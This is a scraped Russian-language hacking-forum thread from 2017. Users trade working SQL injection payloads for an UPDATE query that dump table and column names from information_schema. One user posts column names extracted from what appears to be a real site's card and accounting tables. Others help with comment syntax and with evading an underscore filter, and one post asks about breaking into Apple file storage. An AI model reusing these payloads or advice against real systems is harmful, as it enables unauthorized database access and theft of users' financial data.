ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
27.10.2017, 14:28
|
|
Guest
Сообщений: n/a
Провел на форуме:
300820
Репутация:
90
|
|
Сообщение от foozzione
foozzione said:
↑
просмотрел ман, все вроде как понятно, но не могу воспроизвести в update это хз должно работать
Код:
Code:
',cardno=(SELECT group_conCat('
',table_name,0x3a,column_name) from information_schema.columns where table_schema=database()), name='
-----------------
ааа забыл совсем, там же длина поля cardno есть, все данные не влезут, лучше тогда по одной таблице селектить
|
|
|
|
27.10.2017, 14:42
|
|
Guest
Сообщений: n/a
Провел на форуме:
19301
Репутация:
0
|
|
Сообщение от t0ma5
t0ma5 said:
↑
хз должно работать
Код:
Code:
',cardno=(SELECT group_conCat('
',table_name,0x3a,column_name) from information_schema.columns where table_schema=database()), name='
-----------------
ааа забыл совсем, там же длина поля cardno есть, все данные не влезут, лучше тогда по одной таблице селектить buh:id,
buhos,
buh:name,
buhrderid,
buh:note,
buh:type_,
buh:active,
buh:val1_name,
buh:val1_amount,
buh:val1_rest,
buh:val1_com,
buh:val2_nam
в name тоже скуля, там места больше, вот что выдало
|
|
|
|
27.10.2017, 14:53
|
|
Guest
Сообщений: n/a
Провел на форуме:
19301
Репутация:
0
|
|
Сообщение от t0ma5
t0ma5 said:
↑
хз должно работать
Код:
Code:
',cardno=(SELECT group_conCat('
',table_name,0x3a,column_name) from information_schema.columns where table_schema=database()), name='
-----------------
ааа забыл совсем, там же длина поля cardno есть, все данные не влезут, лучше тогда по одной таблице селектить кстати, подскажи, как по 1 выводить данные из таблиц и каким образом вывести просто все таблицы из бд, остальное сам докручу уже
|
|
|
|
27.10.2017, 15:00
|
|
Guest
Сообщений: n/a
Провел на форуме:
300820
Репутация:
90
|
|
Сообщение от foozzione
foozzione said:
↑
кстати, подскажи, как по 1 выводить данные из таблиц и каким образом вывести просто все таблицы из бд, остальное сам докручу уже как запросы к information_schema писать чтоль, серьезно)?
Код:
Code:
SELECT table_name from information_schema.tables limit 1,1
SELECT column_name from information_schema.columns where table_name='table' limit 1,1
таки вещи давно описаны - /threads/sql-injection-polnyj-faq.43966/
|
|
|
|
27.10.2017, 15:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
19301
Репутация:
0
|
|
Сообщение от t0ma5
t0ma5 said:
↑
как запросы к information_schema писать чтоль, серьезно)?
Код:
Code:
SELECT table_name from information_schema.tables limit 1,1
SELECT column_name from information_schema.tables where table_name='table' limit 1,1
таки вещи давно описаны -
/threads/sql-injection-polnyj-faq.43966/да я вялого поймал, запутал сам себя с запросов в update, мало с ним связывался... лул
|
|
|
|
27.10.2017, 15:14
|
|
Guest
Сообщений: n/a
Провел на форуме:
169212
Репутация:
441
|
|
Сообщение от foozzione
foozzione said:
↑
Код:
Code:
update users_cards set cardno = '123', name = version() where id_users=65 and id=33 #', name = '' where id_users=66 and id=34
ERROR #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'name = '' where id_users=66 and id=34' at line 3
Мистика После коммента с двумя прочерками пробел ставишь?
|
|
|
|
27.10.2017, 15:41
|
|
Guest
Сообщений: n/a
Провел на форуме:
19301
Репутация:
0
|
|
Сообщение от crlf
crlf said:
↑
Мистика
После коммента с двумя прочерками пробел ставишь? конечно
|
|
|
|
27.10.2017, 23:21
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от crlf
crlf said:
↑
Мистика
После коммента с двумя прочерками пробел ставишь? Не поверишь!!! иногда благодаря этому и схватывается скуль)))), хз почему так...
|
|
|
28.10.2017, 07:14
|
|
Guest
Сообщений: n/a
Провел на форуме:
36270
Репутация:
0
|
|
в Яблочное хранилище файлов кто нить влазил ? при условии если телефон в руке ?
|
|
|
|
29.10.2017, 03:52
|
|
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме:
23906
Репутация:
-5
|
|
sql-injection
Кто нибудь сталвкивался с фильтрацией знака "_" подчеркивания, его как то можно побороть?
Даже с тем же table_name режет не говоря уже про таблицы с префиксом
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
